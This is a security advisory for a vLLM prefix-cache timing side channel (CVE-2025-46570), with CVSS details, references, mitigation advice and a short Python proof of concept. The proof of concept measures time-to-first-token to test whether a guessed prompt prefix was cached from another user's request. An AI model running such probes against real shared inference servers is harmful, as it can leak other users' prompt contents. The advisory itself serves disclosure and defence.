CVE-2025-46570

Severity: Low

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention prefix cache already holds a matching prefix chunk, the prefill for that chunk is skipped, which shortens the TTFT (Time to First Token). The resulting timing difference is large enough to be measured, allowing an attacker to infer whether a guessed prefix matches one cached from another request. This issue has been patched in version 0.9.0.
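
To make the side channel concrete, the minimal sketch below measures TTFT for streaming completion requests against a vLLM OpenAI-compatible endpoint. The base URL, model name, and prompt contents are illustrative assumptions rather than details from the advisory; on a pre-0.9.0 server with prefix caching enabled, a guessed prefix that matches another user's cached prefix would return its first token measurably faster than an uncached one.

    # Illustrative TTFT probe for CVE-2025-46570. Assumptions: the endpoint
    # URL, model name, and prompts below are placeholders, not from the advisory.
    import time

    import requests

    BASE_URL = "http://localhost:8000/v1/completions"  # hypothetical vLLM endpoint
    MODEL = "example-model"                            # placeholder model name


    def time_to_first_token(prompt: str) -> float:
        """Send a streaming completion request and return TTFT in seconds."""
        start = time.monotonic()
        with requests.post(
            BASE_URL,
            json={"model": MODEL, "prompt": prompt, "max_tokens": 1, "stream": True},
            stream=True,
            timeout=30,
        ) as resp:
            resp.raise_for_status()
            for line in resp.iter_lines():
                if line:  # first non-empty SSE line arrives with the first token
                    return time.monotonic() - start
        return float("inf")


    # A guessed prefix that may already sit in the server's prefix cache,
    # versus a control prefix that almost certainly does not.
    guessed = "guessed shared prefix " + "A" * 512
    control = "random control prefix " + "B" * 512

    # Prior to 0.9.0, a noticeably lower TTFT for the guessed prefix suggests
    # the prefill skipped cached chunks, i.e. another request used that prefix.
    print("guessed TTFT:", time_to_first_token(guessed))
    print("control TTFT:", time_to_first_token(control))

Upgrading to 0.9.0 removes the exploitable difference; on deployments that cannot upgrade immediately, disabling prefix caching (for example via the enable_prefix_caching engine argument, where the deployed version exposes it) closes the channel at the cost of losing the prefill speedup.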

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-4qjh-9fv9-r85r

https://github.com/vllm-project/vllm/pull/17045

https://github.com/vllm-project/vllm/commit/77073c77bc2006eb80ea6d5128f076f5e6c6f54f

Details

Source: MITRE, NVD

Published: 2025-05-29

Updated: 2025-05-30

Risk Information

CVSS v2

Base Score: 2.1

Vector: CVSS2#AV:N/AC:H/Au:S/C:P/I:N/A:N

Severity: Low

CVSS v3

Base Score: 2.6

Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Severity: Low
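
For readers checking the arithmetic, the following minimal sketch reproduces the 2.6 base score from the vector above using the metric weights in the CVSS v3.0 specification (the specification's Roundup function is approximated here with math.ceil):

    import math

    # CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N
    av, ac, pr, ui = 0.85, 0.44, 0.62, 0.62  # Network / High / Low (scope unchanged) / Required
    c, i, a = 0.22, 0.0, 0.0                 # Confidentiality Low / Integrity None / Availability None

    iss = 1 - (1 - c) * (1 - i) * (1 - a)    # impact sub-score = 0.22
    impact = 6.42 * iss                      # scope unchanged
    exploitability = 8.22 * av * ac * pr * ui

    base = 0.0 if impact <= 0 else math.ceil(min(impact + exploitability, 10.0) * 10) / 10
    print(base)  # 2.6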

EPSS

EPSS Score: 0.00027